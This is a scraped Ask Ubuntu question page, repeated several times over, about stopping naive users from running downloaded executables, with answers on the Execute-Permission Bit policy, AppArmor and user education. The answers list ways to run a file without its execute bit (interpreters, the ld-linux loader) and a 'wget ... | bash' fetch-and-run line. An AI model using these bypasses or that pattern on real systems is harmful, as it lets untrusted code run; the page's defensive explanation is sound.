Is there any way to stop a user from creating executables and running them?Permission of a .desktop fileWhat are the differences between executing shell scripts using “source file.sh”, “./file.sh”, “sh file.sh”, “. ./file.sh”?how do i stop root from running a programIs there any way to log activites performed by a user(another super user)?Running shell script from external drive via live userDifferentiating user-defined executables from pre-existing executables
How do some PhD students get 10+ papers? Is that what I need for landing good faculty position?
80's/90's superhero cartoon with a man on fire and a man who made ice runways like Frozone
How does "Te vas a cansar" mean "You're going to get tired"?
Loading military units into ships optimally, using backtracking
How to take the beginning and end parts of a list with simpler syntax?
How to remove ambiguity: "... lives in the city of H, the capital of the province of NS, WHERE the unemployment rate is ..."?
What does the phrase "pull off sick wheelies and flips" mean here?
Redis Cache Shared Session Configuration
A torrent of foreign terms
Markov-chain sentence generator in Python
how do companies get money from being listed publicly
Why are Gatwick's runways too close together?
visible indication that a cell is not evaluatable
Can a PC use the Levitate spell to avoid movement speed reduction from exhaustion?
Why are Tucker and Malcolm not dead?
Are employers legally allowed to pay employees in goods and services equal to or greater than the minimum wage?
Can "être sur" mean "to be about" ?
Understanding the point of a kölsche Witz
Why did I get only 5 points even though I won?
Why isn’t SHA-3 in wider use?
If a digital camera can be "hacked" in the ransomware sense, how best to protect it?
Simplification of numbers
On the Rømer experiments and the speed of light
Heat equation: Squiggly lines
Is there any way to stop a user from creating executables and running them?
Permission of a .desktop fileWhat are the differences between executing shell scripts using “source file.sh”, “./file.sh”, “sh file.sh”, “. ./file.sh”?how do i stop root from running a programIs there any way to log activites performed by a user(another super user)?Running shell script from external drive via live userDifferentiating user-defined executables from pre-existing executables
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;
Ransomware attacks could use zero-day exploits, but often an attacker will just fool a gullible user into running an executable by downloading and clicking.
Suppose we have a naive user and want to restrict them to the normal path. Is there any way to restrict them from creating a file with executable privilege?
Or, more generally, is there any way to build an access control list and define that this user may only execute files in this list?
permissions security executable restricted-access
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
add a comment |
Ransomware attacks could use zero-day exploits, but often an attacker will just fool a gullible user into running an executable by downloading and clicking.
Suppose we have a naive user and want to restrict them to the normal path. Is there any way to restrict them from creating a file with executable privilege?
Or, more generally, is there any way to build an access control list and define that this user may only execute files in this list?
permissions security executable restricted-access
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
4
To disable execution in this manner would prohibit users from being able to do anything on system. There is no mechanism for this in-built to the system or even with third party software that I am aware of to do this type of security lockdown
– Thomas Ward♦
14 hours ago
not answering but hint what you can do: add noexec on user writable mounts. wont prevent scripts but actual binary execution.
– Sampo Sarrala
1 hour ago
add a comment |
Ransomware attacks could use zero-day exploits, but often an attacker will just fool a gullible user into running an executable by downloading and clicking.
Suppose we have a naive user and want to restrict them to the normal path. Is there any way to restrict them from creating a file with executable privilege?
Or, more generally, is there any way to build an access control list and define that this user may only execute files in this list?
permissions security executable restricted-access
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
Ransomware attacks could use zero-day exploits, but often an attacker will just fool a gullible user into running an executable by downloading and clicking.
Suppose we have a naive user and want to restrict them to the normal path. Is there any way to restrict them from creating a file with executable privilege?
Or, more generally, is there any way to build an access control list and define that this user may only execute files in this list?
permissions security executable restricted-access
permissions security executable restricted-access
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
edited 13 hours ago
Eliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
88.1k22 gold badges245 silver badges387 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
asked 15 hours ago
DovDov
2481 silver badge11 bronze badges
2481 silver badge11 bronze badges
4
To disable execution in this manner would prohibit users from being able to do anything on system. There is no mechanism for this in-built to the system or even with third party software that I am aware of to do this type of security lockdown
– Thomas Ward♦
14 hours ago
not answering but hint what you can do: add noexec on user writable mounts. wont prevent scripts but actual binary execution.
– Sampo Sarrala
1 hour ago
add a comment |
4
To disable execution in this manner would prohibit users from being able to do anything on system. There is no mechanism for this in-built to the system or even with third party software that I am aware of to do this type of security lockdown
– Thomas Ward♦
14 hours ago
not answering but hint what you can do: add noexec on user writable mounts. wont prevent scripts but actual binary execution.
– Sampo Sarrala
1 hour ago
4
4
To disable execution in this manner would prohibit users from being able to do anything on system. There is no mechanism for this in-built to the system or even with third party software that I am aware of to do this type of security lockdown
– Thomas Ward♦
14 hours ago
To disable execution in this manner would prohibit users from being able to do anything on system. There is no mechanism for this in-built to the system or even with third party software that I am aware of to do this type of security lockdown
– Thomas Ward♦
14 hours ago
not answering but hint what you can do: add noexec on user writable mounts. wont prevent scripts but actual binary execution.
– Sampo Sarrala
1 hour ago
not answering but hint what you can do: add noexec on user writable mounts. wont prevent scripts but actual binary execution.
– Sampo Sarrala
1 hour ago
add a comment |
2 Answers
2
active
oldest
votes
The specific attack you've expressed concern about is:
often an attacker will just fool a gullible user into running an executable by downloading and clicking.
At least in the common case where the file is downloaded in a web browser, this should already be prevented in Ubuntu by the browser's adherence to the Execute-Permission Bit Required policy. The most directly relevant parts of that policy are:
Applications, including desktops and shells, must not run executable code from files when they are both:
- lacking the executable bit
- located in a user's home directory or temporary directory.
- Files downloaded from a web browser, mail client, etc. must never be saved as executable.
So if a user is told to download a program in a web browser, does so, and attempts to run the file by double-clicking on it, it won't run. This applies even if the file downloaded is a shell script or even a .desktop file. (If you've ever wondered why .desktop files in your home directory have to be marked executable even though they're not really programs, that's why.)
It is possible for users to alter this behavior through configuration changes. Most will not, and while those who do probably shouldn't, that's not really what you have to worry about. The bigger concern is the more complex attack that I think you're already worried about, in which a malicious person (or bot) instructs the user to download a specific file, mark it executable themselves (through their file browser or with chmod), and then run it.
Unfortunately, restricting a user's ability to set the execute bit on a file or to execute files other than those on some whitelist wouldn't noticeably mitigate the problem. Some attacks will already work, and those that don't could be trivially modified so that they do. The fundamental issue is that the effect of running a file can be achieved even if the file doesn't have executable permissions.
This is best illustrated by example. Suppose evil is a file in the current directory that, if given executable permissions (chmod +x evil) and run (./evil), would do something evil. Depending on what kind of program it is, the same effect may be achieved by one of the following:
. ./evilorsource ./evilruns the commands inevil.shin the currently running shell.bash ./evilrunsevilinbash.python3 evilrunsevilinpython3.perl evilrunsevilinperl.- ...and in general,
interpreter evilrunsevilin the interpreterinterpreter. - On most systems,
/lib64/ld-linux-x86-64.so.2 ./evilruns the binary executableevil.
None of those, not even the last one, require that the file have executable permissions or even that the user be able to give the file executable permissions.
But the malicious instructions don't even have to be that complicated. Consider this non-malicious command, which is one of the officially recommended ways to install or update NVM:
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
The reason that's not malicious is that NVM isn't malware, but if the URL were instead to someone's script that does evil when run, that command would download and run the script. At no point would any file need to be given executable permissions. Downloading and running the code contained in a malicious file with a single command like this is, I believe, a pretty common action that attackers trick users into taking.
You might think of trying to restrict what interpreters are available for the users to run. But there isn't really a way to do this that doesn't substantially impact the ordinary tasks you presumably want users to be able to do. If you're setting up an extremely restricted environment on which nearly everything a user would think of to do on a computer is disallowed, like a kiosk that only runs a couple programs, then this might provide some measure of meaningful protection. But it doesn't sound like that's your use case.
So the approximate answer to your question is, "No." The fuller answer is that you could probably manage to prevent users from executing any files except those that you supply on a whitelist. But that's in the strict, technical sense of "execute," which is not needed to achieve the full effect of running most programs or scripts. To prevent that, you could try to make the whitelist very small, so it didn't list any interpreters except those that could be highly restricted. But even if you managed that, users couldn't do much, and if you made it so small they couldn't hurt themselves, they probably couldn't do anything. (See Thomas Ward's comment.)
If your users can hurt themselves, they can be fooled into hurting themselves.
You may be able to restrict specific programs from being used or otherwise behaving in ways that are likely to be harmful, and if you're looking at specific patterns ransomware tends to follow, you may be able to prevent some specific common cases. (See AppArmor.) That might provide some value. But it won't give you anything close to the comprehensive solution you're hoping for.
Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
2
Awesome and upvoted.
– WinEunuuchs2Unix
12 hours ago
1
Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.
– Peter Cordes
1 hour ago
add a comment |
From: In Linux, how can I prevent users from executing chown, chgrp or chmod?
chown: Already requires root.
chgrp: Users can only change into groups they themselves belong to.
chmod: Probably impossible to restrict - unless you also block all
programming language compilers/interpreters and disable any remote
filesystem access (including SFTP).
(It might be possible to block the
chmod()syscall with something
like AppArmor (if it can block syscalls at all), but it would break a
whole lot of programs.)
It sounds like you've come up with a great feature request for Firefox and Chrome.
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
add a comment |
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "89"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1165175%2fis-there-any-way-to-stop-a-user-from-creating-executables-and-running-them%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
2 Answers
2
active
oldest
votes
2 Answers
2
active
oldest
votes
active
oldest
votes
active
oldest
votes
The specific attack you've expressed concern about is:
often an attacker will just fool a gullible user into running an executable by downloading and clicking.
At least in the common case where the file is downloaded in a web browser, this should already be prevented in Ubuntu by the browser's adherence to the Execute-Permission Bit Required policy. The most directly relevant parts of that policy are:
Applications, including desktops and shells, must not run executable code from files when they are both:
- lacking the executable bit
- located in a user's home directory or temporary directory.
- Files downloaded from a web browser, mail client, etc. must never be saved as executable.
So if a user is told to download a program in a web browser, does so, and attempts to run the file by double-clicking on it, it won't run. This applies even if the file downloaded is a shell script or even a .desktop file. (If you've ever wondered why .desktop files in your home directory have to be marked executable even though they're not really programs, that's why.)
It is possible for users to alter this behavior through configuration changes. Most will not, and while those who do probably shouldn't, that's not really what you have to worry about. The bigger concern is the more complex attack that I think you're already worried about, in which a malicious person (or bot) instructs the user to download a specific file, mark it executable themselves (through their file browser or with chmod), and then run it.
Unfortunately, restricting a user's ability to set the execute bit on a file or to execute files other than those on some whitelist wouldn't noticeably mitigate the problem. Some attacks will already work, and those that don't could be trivially modified so that they do. The fundamental issue is that the effect of running a file can be achieved even if the file doesn't have executable permissions.
This is best illustrated by example. Suppose evil is a file in the current directory that, if given executable permissions (chmod +x evil) and run (./evil), would do something evil. Depending on what kind of program it is, the same effect may be achieved by one of the following:
. ./evilorsource ./evilruns the commands inevil.shin the currently running shell.bash ./evilrunsevilinbash.python3 evilrunsevilinpython3.perl evilrunsevilinperl.- ...and in general,
interpreter evilrunsevilin the interpreterinterpreter. - On most systems,
/lib64/ld-linux-x86-64.so.2 ./evilruns the binary executableevil.
None of those, not even the last one, require that the file have executable permissions or even that the user be able to give the file executable permissions.
But the malicious instructions don't even have to be that complicated. Consider this non-malicious command, which is one of the officially recommended ways to install or update NVM:
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
The reason that's not malicious is that NVM isn't malware, but if the URL were instead to someone's script that does evil when run, that command would download and run the script. At no point would any file need to be given executable permissions. Downloading and running the code contained in a malicious file with a single command like this is, I believe, a pretty common action that attackers trick users into taking.
You might think of trying to restrict what interpreters are available for the users to run. But there isn't really a way to do this that doesn't substantially impact the ordinary tasks you presumably want users to be able to do. If you're setting up an extremely restricted environment on which nearly everything a user would think of to do on a computer is disallowed, like a kiosk that only runs a couple programs, then this might provide some measure of meaningful protection. But it doesn't sound like that's your use case.
So the approximate answer to your question is, "No." The fuller answer is that you could probably manage to prevent users from executing any files except those that you supply on a whitelist. But that's in the strict, technical sense of "execute," which is not needed to achieve the full effect of running most programs or scripts. To prevent that, you could try to make the whitelist very small, so it didn't list any interpreters except those that could be highly restricted. But even if you managed that, users couldn't do much, and if you made it so small they couldn't hurt themselves, they probably couldn't do anything. (See Thomas Ward's comment.)
If your users can hurt themselves, they can be fooled into hurting themselves.
You may be able to restrict specific programs from being used or otherwise behaving in ways that are likely to be harmful, and if you're looking at specific patterns ransomware tends to follow, you may be able to prevent some specific common cases. (See AppArmor.) That might provide some value. But it won't give you anything close to the comprehensive solution you're hoping for.
Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
2
Awesome and upvoted.
– WinEunuuchs2Unix
12 hours ago
1
Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.
– Peter Cordes
1 hour ago
add a comment |
The specific attack you've expressed concern about is:
often an attacker will just fool a gullible user into running an executable by downloading and clicking.
At least in the common case where the file is downloaded in a web browser, this should already be prevented in Ubuntu by the browser's adherence to the Execute-Permission Bit Required policy. The most directly relevant parts of that policy are:
Applications, including desktops and shells, must not run executable code from files when they are both:
- lacking the executable bit
- located in a user's home directory or temporary directory.
- Files downloaded from a web browser, mail client, etc. must never be saved as executable.
So if a user is told to download a program in a web browser, does so, and attempts to run the file by double-clicking on it, it won't run. This applies even if the file downloaded is a shell script or even a .desktop file. (If you've ever wondered why .desktop files in your home directory have to be marked executable even though they're not really programs, that's why.)
It is possible for users to alter this behavior through configuration changes. Most will not, and while those who do probably shouldn't, that's not really what you have to worry about. The bigger concern is the more complex attack that I think you're already worried about, in which a malicious person (or bot) instructs the user to download a specific file, mark it executable themselves (through their file browser or with chmod), and then run it.
Unfortunately, restricting a user's ability to set the execute bit on a file or to execute files other than those on some whitelist wouldn't noticeably mitigate the problem. Some attacks will already work, and those that don't could be trivially modified so that they do. The fundamental issue is that the effect of running a file can be achieved even if the file doesn't have executable permissions.
This is best illustrated by example. Suppose evil is a file in the current directory that, if given executable permissions (chmod +x evil) and run (./evil), would do something evil. Depending on what kind of program it is, the same effect may be achieved by one of the following:
. ./evilorsource ./evilruns the commands inevil.shin the currently running shell.bash ./evilrunsevilinbash.python3 evilrunsevilinpython3.perl evilrunsevilinperl.- ...and in general,
interpreter evilrunsevilin the interpreterinterpreter. - On most systems,
/lib64/ld-linux-x86-64.so.2 ./evilruns the binary executableevil.
None of those, not even the last one, require that the file have executable permissions or even that the user be able to give the file executable permissions.
But the malicious instructions don't even have to be that complicated. Consider this non-malicious command, which is one of the officially recommended ways to install or update NVM:
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
The reason that's not malicious is that NVM isn't malware, but if the URL were instead to someone's script that does evil when run, that command would download and run the script. At no point would any file need to be given executable permissions. Downloading and running the code contained in a malicious file with a single command like this is, I believe, a pretty common action that attackers trick users into taking.
You might think of trying to restrict what interpreters are available for the users to run. But there isn't really a way to do this that doesn't substantially impact the ordinary tasks you presumably want users to be able to do. If you're setting up an extremely restricted environment on which nearly everything a user would think of to do on a computer is disallowed, like a kiosk that only runs a couple programs, then this might provide some measure of meaningful protection. But it doesn't sound like that's your use case.
So the approximate answer to your question is, "No." The fuller answer is that you could probably manage to prevent users from executing any files except those that you supply on a whitelist. But that's in the strict, technical sense of "execute," which is not needed to achieve the full effect of running most programs or scripts. To prevent that, you could try to make the whitelist very small, so it didn't list any interpreters except those that could be highly restricted. But even if you managed that, users couldn't do much, and if you made it so small they couldn't hurt themselves, they probably couldn't do anything. (See Thomas Ward's comment.)
If your users can hurt themselves, they can be fooled into hurting themselves.
You may be able to restrict specific programs from being used or otherwise behaving in ways that are likely to be harmful, and if you're looking at specific patterns ransomware tends to follow, you may be able to prevent some specific common cases. (See AppArmor.) That might provide some value. But it won't give you anything close to the comprehensive solution you're hoping for.
Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
2
Awesome and upvoted.
– WinEunuuchs2Unix
12 hours ago
1
Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.
– Peter Cordes
1 hour ago
add a comment |
The specific attack you've expressed concern about is:
often an attacker will just fool a gullible user into running an executable by downloading and clicking.
At least in the common case where the file is downloaded in a web browser, this should already be prevented in Ubuntu by the browser's adherence to the Execute-Permission Bit Required policy. The most directly relevant parts of that policy are:
Applications, including desktops and shells, must not run executable code from files when they are both:
- lacking the executable bit
- located in a user's home directory or temporary directory.
- Files downloaded from a web browser, mail client, etc. must never be saved as executable.
So if a user is told to download a program in a web browser, does so, and attempts to run the file by double-clicking on it, it won't run. This applies even if the file downloaded is a shell script or even a .desktop file. (If you've ever wondered why .desktop files in your home directory have to be marked executable even though they're not really programs, that's why.)
It is possible for users to alter this behavior through configuration changes. Most will not, and while those who do probably shouldn't, that's not really what you have to worry about. The bigger concern is the more complex attack that I think you're already worried about, in which a malicious person (or bot) instructs the user to download a specific file, mark it executable themselves (through their file browser or with chmod), and then run it.
Unfortunately, restricting a user's ability to set the execute bit on a file or to execute files other than those on some whitelist wouldn't noticeably mitigate the problem. Some attacks will already work, and those that don't could be trivially modified so that they do. The fundamental issue is that the effect of running a file can be achieved even if the file doesn't have executable permissions.
This is best illustrated by example. Suppose evil is a file in the current directory that, if given executable permissions (chmod +x evil) and run (./evil), would do something evil. Depending on what kind of program it is, the same effect may be achieved by one of the following:
. ./evilorsource ./evilruns the commands inevil.shin the currently running shell.bash ./evilrunsevilinbash.python3 evilrunsevilinpython3.perl evilrunsevilinperl.- ...and in general,
interpreter evilrunsevilin the interpreterinterpreter. - On most systems,
/lib64/ld-linux-x86-64.so.2 ./evilruns the binary executableevil.
None of those, not even the last one, require that the file have executable permissions or even that the user be able to give the file executable permissions.
But the malicious instructions don't even have to be that complicated. Consider this non-malicious command, which is one of the officially recommended ways to install or update NVM:
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
The reason that's not malicious is that NVM isn't malware, but if the URL were instead to someone's script that does evil when run, that command would download and run the script. At no point would any file need to be given executable permissions. Downloading and running the code contained in a malicious file with a single command like this is, I believe, a pretty common action that attackers trick users into taking.
You might think of trying to restrict what interpreters are available for the users to run. But there isn't really a way to do this that doesn't substantially impact the ordinary tasks you presumably want users to be able to do. If you're setting up an extremely restricted environment on which nearly everything a user would think of to do on a computer is disallowed, like a kiosk that only runs a couple programs, then this might provide some measure of meaningful protection. But it doesn't sound like that's your use case.
So the approximate answer to your question is, "No." The fuller answer is that you could probably manage to prevent users from executing any files except those that you supply on a whitelist. But that's in the strict, technical sense of "execute," which is not needed to achieve the full effect of running most programs or scripts. To prevent that, you could try to make the whitelist very small, so it didn't list any interpreters except those that could be highly restricted. But even if you managed that, users couldn't do much, and if you made it so small they couldn't hurt themselves, they probably couldn't do anything. (See Thomas Ward's comment.)
If your users can hurt themselves, they can be fooled into hurting themselves.
You may be able to restrict specific programs from being used or otherwise behaving in ways that are likely to be harmful, and if you're looking at specific patterns ransomware tends to follow, you may be able to prevent some specific common cases. (See AppArmor.) That might provide some value. But it won't give you anything close to the comprehensive solution you're hoping for.
Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
The specific attack you've expressed concern about is:
often an attacker will just fool a gullible user into running an executable by downloading and clicking.
At least in the common case where the file is downloaded in a web browser, this should already be prevented in Ubuntu by the browser's adherence to the Execute-Permission Bit Required policy. The most directly relevant parts of that policy are:
Applications, including desktops and shells, must not run executable code from files when they are both:
- lacking the executable bit
- located in a user's home directory or temporary directory.
- Files downloaded from a web browser, mail client, etc. must never be saved as executable.
So if a user is told to download a program in a web browser, does so, and attempts to run the file by double-clicking on it, it won't run. This applies even if the file downloaded is a shell script or even a .desktop file. (If you've ever wondered why .desktop files in your home directory have to be marked executable even though they're not really programs, that's why.)
It is possible for users to alter this behavior through configuration changes. Most will not, and while those who do probably shouldn't, that's not really what you have to worry about. The bigger concern is the more complex attack that I think you're already worried about, in which a malicious person (or bot) instructs the user to download a specific file, mark it executable themselves (through their file browser or with chmod), and then run it.
Unfortunately, restricting a user's ability to set the execute bit on a file or to execute files other than those on some whitelist wouldn't noticeably mitigate the problem. Some attacks will already work, and those that don't could be trivially modified so that they do. The fundamental issue is that the effect of running a file can be achieved even if the file doesn't have executable permissions.
This is best illustrated by example. Suppose evil is a file in the current directory that, if given executable permissions (chmod +x evil) and run (./evil), would do something evil. Depending on what kind of program it is, the same effect may be achieved by one of the following:
. ./evilorsource ./evilruns the commands inevil.shin the currently running shell.bash ./evilrunsevilinbash.python3 evilrunsevilinpython3.perl evilrunsevilinperl.- ...and in general,
interpreter evilrunsevilin the interpreterinterpreter. - On most systems,
/lib64/ld-linux-x86-64.so.2 ./evilruns the binary executableevil.
None of those, not even the last one, require that the file have executable permissions or even that the user be able to give the file executable permissions.
But the malicious instructions don't even have to be that complicated. Consider this non-malicious command, which is one of the officially recommended ways to install or update NVM:
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
The reason that's not malicious is that NVM isn't malware, but if the URL were instead to someone's script that does evil when run, that command would download and run the script. At no point would any file need to be given executable permissions. Downloading and running the code contained in a malicious file with a single command like this is, I believe, a pretty common action that attackers trick users into taking.
You might think of trying to restrict what interpreters are available for the users to run. But there isn't really a way to do this that doesn't substantially impact the ordinary tasks you presumably want users to be able to do. If you're setting up an extremely restricted environment on which nearly everything a user would think of to do on a computer is disallowed, like a kiosk that only runs a couple programs, then this might provide some measure of meaningful protection. But it doesn't sound like that's your use case.
So the approximate answer to your question is, "No." The fuller answer is that you could probably manage to prevent users from executing any files except those that you supply on a whitelist. But that's in the strict, technical sense of "execute," which is not needed to achieve the full effect of running most programs or scripts. To prevent that, you could try to make the whitelist very small, so it didn't list any interpreters except those that could be highly restricted. But even if you managed that, users couldn't do much, and if you made it so small they couldn't hurt themselves, they probably couldn't do anything. (See Thomas Ward's comment.)
If your users can hurt themselves, they can be fooled into hurting themselves.
You may be able to restrict specific programs from being used or otherwise behaving in ways that are likely to be harmful, and if you're looking at specific patterns ransomware tends to follow, you may be able to prevent some specific common cases. (See AppArmor.) That might provide some value. But it won't give you anything close to the comprehensive solution you're hoping for.
Whatever technical measures (if any) you end up taking, your best bet is to educate users. This includes telling them not to run commands they don't understand and not to use downloaded files in situations where they wouldn't be able to explain why it's reasonably safe to do so. But it also includes things like making backups, so that if something does go wrong (due to malware or otherwise), the harm done will be as little as possible.
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
edited 9 hours ago
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
answered 13 hours ago
Eliah KaganEliah Kagan
88.1k22 gold badges245 silver badges387 bronze badges
88.1k22 gold badges245 silver badges387 bronze badges
2
Awesome and upvoted.
– WinEunuuchs2Unix
12 hours ago
1
Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.
– Peter Cordes
1 hour ago
add a comment |
2
Awesome and upvoted.
– WinEunuuchs2Unix
12 hours ago
1
Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.
– Peter Cordes
1 hour ago
2
2
Awesome and upvoted.
– WinEunuuchs2Unix
12 hours ago
Awesome and upvoted.
– WinEunuuchs2Unix
12 hours ago
1
1
Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.
– Peter Cordes
1 hour ago
Perhaps the non-technical measures need to include having contact info for someone that can sanity check something they want to do. Any time they're not sure, call or message and ask. That might remove the temptation to guess.
– Peter Cordes
1 hour ago
add a comment |
From: In Linux, how can I prevent users from executing chown, chgrp or chmod?
chown: Already requires root.
chgrp: Users can only change into groups they themselves belong to.
chmod: Probably impossible to restrict - unless you also block all
programming language compilers/interpreters and disable any remote
filesystem access (including SFTP).
(It might be possible to block the
chmod()syscall with something
like AppArmor (if it can block syscalls at all), but it would break a
whole lot of programs.)
It sounds like you've come up with a great feature request for Firefox and Chrome.
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
add a comment |
From: In Linux, how can I prevent users from executing chown, chgrp or chmod?
chown: Already requires root.
chgrp: Users can only change into groups they themselves belong to.
chmod: Probably impossible to restrict - unless you also block all
programming language compilers/interpreters and disable any remote
filesystem access (including SFTP).
(It might be possible to block the
chmod()syscall with something
like AppArmor (if it can block syscalls at all), but it would break a
whole lot of programs.)
It sounds like you've come up with a great feature request for Firefox and Chrome.
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
add a comment |
From: In Linux, how can I prevent users from executing chown, chgrp or chmod?
chown: Already requires root.
chgrp: Users can only change into groups they themselves belong to.
chmod: Probably impossible to restrict - unless you also block all
programming language compilers/interpreters and disable any remote
filesystem access (including SFTP).
(It might be possible to block the
chmod()syscall with something
like AppArmor (if it can block syscalls at all), but it would break a
whole lot of programs.)
It sounds like you've come up with a great feature request for Firefox and Chrome.
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
From: In Linux, how can I prevent users from executing chown, chgrp or chmod?
chown: Already requires root.
chgrp: Users can only change into groups they themselves belong to.
chmod: Probably impossible to restrict - unless you also block all
programming language compilers/interpreters and disable any remote
filesystem access (including SFTP).
(It might be possible to block the
chmod()syscall with something
like AppArmor (if it can block syscalls at all), but it would break a
whole lot of programs.)
It sounds like you've come up with a great feature request for Firefox and Chrome.
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
answered 12 hours ago
WinEunuuchs2UnixWinEunuuchs2Unix
56.6k16 gold badges111 silver badges217 bronze badges
56.6k16 gold badges111 silver badges217 bronze badges
add a comment |
add a comment |
Thanks for contributing an answer to Ask Ubuntu!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1165175%2fis-there-any-way-to-stop-a-user-from-creating-executables-and-running-them%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
